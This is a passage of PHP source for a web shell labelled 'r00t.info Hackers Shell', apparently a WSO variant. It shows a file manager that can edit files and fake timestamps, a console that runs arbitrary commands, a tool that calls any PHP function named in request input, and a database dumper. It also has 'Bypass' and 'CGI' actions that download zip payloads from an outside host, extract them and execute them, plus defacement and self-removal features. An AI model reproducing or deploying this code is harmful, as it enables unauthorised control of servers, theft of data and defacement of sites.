(int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select> \r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/> \r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&\r\nwidth=260&\r\ncolorsche\r\nme=light&\r\nshow_faces=true&\r\nborder_color=\r\n%23fff&\r\nstream=false&\r\nheader=false&\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, 